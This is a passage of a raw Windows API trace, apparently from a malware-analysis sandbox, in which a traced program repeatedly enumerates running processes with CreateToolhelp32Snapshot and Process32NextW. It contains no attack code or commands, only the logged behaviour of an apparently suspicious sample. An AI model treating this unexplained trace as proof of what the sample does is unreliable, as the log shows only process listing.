[0105.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0105.840] CloseHandle (hObject=0xbc) returned 1 [0105.840] Sleep (dwMilliseconds=0x12c) [0106.151] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.156] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 